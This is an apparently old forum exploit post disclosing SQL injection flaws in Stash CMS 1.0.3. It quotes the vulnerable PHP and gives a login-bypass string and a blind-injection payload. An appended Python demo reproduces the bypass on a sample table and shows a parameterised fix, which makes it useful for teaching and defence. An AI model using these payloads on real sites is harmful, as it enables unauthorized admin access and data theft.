
27.02.2010, 19:43
Stash CMS 1.0.3
1) bypass (requirements: mq=off)
file: /admin/library/authenticate.php
PHP code:
    function login($username,$password,$remember,$location){
        $database = new Db();
        // $username and $password are concatenated straight into the query
        $results = $database->sqlQuery("SELECT user_key,user_firstname,user_lastname, user_admin FROM ".TBPREFIX."_user WHERE user_password = '$password' AND user_username = '$username'");
        if($results){
            // the loop keeps the values of the last row returned
            foreach($results as $results){
                $userkey = $results['user_key'];
                $firstname = $results['user_firstname'];
                $lastname = $results['user_lastname'];
                $admin = $results['user_admin'];
            }
            $name = $firstname." ".$lastname;
            $uniquekey = $name.$userkey;
            $uniquekey = md5($uniquekey);
            $_SESSION['username'] = $name;
            $_SESSION['userkey'] = $userkey;
            $_SESSION['uniquekey'] = $uniquekey;
            $_SESSION['admin'] = $admin;
            if ($remember == true){
                setcookie("bsm", $userkey, time()+108000); /* expire in 30 days */
                setcookie("msb", $uniquekey, time()+108000); /* expire in 30 days */
            }
            header('location:'.$location);
        }else{
            return false;
        }
    }
result:
login: ' or '1'='1
pass: asd
-------------------
old news
-------------------
3) blind SQL injection (requirements: mq=off, preferably a 5.x branch of the DB)
file: resetpassword.php
PHP code:
    $username = $_POST['username'];
    // $username goes unescaped into the query
    $check = $database->sqlQuery("SELECT count(*) as cnt FROM ".TBPREFIX."_user WHERE user_username = '$username'",TRUE,FALSE);
    if($check['cnt'] == 0){
        if ($username == '') {
            $msg = 'You must enter your Username';
        }else {
            $msg = $username. " doesn't exist";
        }
    }
result:
Click "Forgot your password" on /admin/login.php and enter the following in the username field:
Code:
'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)/**/and/**/'1'='1
......
Last edited by .:[melkiy]:.; 27.02.2010 at 20:04.
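The following is an added example, not code from the post or from Stash CMS. It reproduces the login query from authenticate.php by string concatenation against an in-memory sqlite table, shows that the `' or '1'='1` username from the post matches every row (and that the PHP loop keeps the last row, so the session ends up as whichever user sorts last), and contrasts it with a parameterised query. The table name `stash_user`, the sample rows and the helper names are assumptions; the column names come from the queries in the post. Because magic_quotes_gpc adds backslash escapes that MySQL honours and sqlite does not, the "mq=on" case is simulated by doubling quotes, the standard-SQL equivalent. The resetpassword.php query is only composed, not executed: `name_const()` is MySQL-specific.

```python
import sqlite3

# Constructed sample rows standing in for the <TBPREFIX>_user table.
# Column names follow the queries in the post; everything else is assumed.
SAMPLE_USERS = [
    ("k1", "Bob", "Editor", 0, "bob", "hunter2"),
    ("k2", "Alice", "Admin", 1, "admin", "s3cret"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE stash_user (user_key TEXT, user_firstname TEXT, "
        "user_lastname TEXT, user_admin INTEGER, user_username TEXT, "
        "user_password TEXT)"
    )
    conn.executemany("INSERT INTO stash_user VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def login_query(username, password):
    """SQL built the way authenticate.php builds it: by concatenation."""
    return (
        "SELECT user_key, user_firstname, user_lastname, user_admin "
        "FROM stash_user WHERE user_password = '%s' AND user_username = '%s'"
        % (password, username)
    )


def reset_query(username):
    """The concatenated query from resetpassword.php. Composed only: the
    name_const() payload from the post needs MySQL and cannot run on sqlite."""
    return "SELECT count(*) as cnt FROM stash_user WHERE user_username = '%s'" % username


def vulnerable_login(conn, username, password):
    rows = conn.execute(login_query(username, password)).fetchall()
    if not rows:
        return None
    # authenticate.php overwrites its variables on every loop iteration,
    # so a WHERE clause that matches all users yields the last row.
    return rows[-1]


def fixed_login(conn, username, password):
    # Same query with placeholders: the input is data, never SQL.
    rows = conn.execute(
        "SELECT user_key, user_firstname, user_lastname, user_admin "
        "FROM stash_user WHERE user_password = ? AND user_username = ?",
        (password, username),
    ).fetchall()
    return rows[-1] if rows else None


def quote_escaped(s):
    """Stand-in for magic_quotes_gpc (assumption): MySQL honours the
    backslash escapes it adds, sqlite only knows doubled quotes."""
    return s.replace("'", "''")


def demo():
    conn = build_db()
    user, pw = "' or '1'='1", "asd"  # the bypass credentials from the post
    return {
        "vulnerable_mq_off": vulnerable_login(conn, user, pw),
        "vulnerable_mq_on": vulnerable_login(conn, quote_escaped(user), quote_escaped(pw)),
        "parameterised": fixed_login(conn, user, pw),
        "legit": fixed_login(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for case, row in demo().items():
        print(case, row)
    print(login_query("' or '1'='1", "asd"))
```

With mq=off the bypass lands on the admin row because `AND` binds tighter than `OR`, so the clause reads `(password = 'asd' AND username = '') OR '1'='1'`. With quoting in place the whole payload becomes one string literal and matches nobody, which is exactly why the post lists mq=off as a requirement; the parameterised version does not care either way.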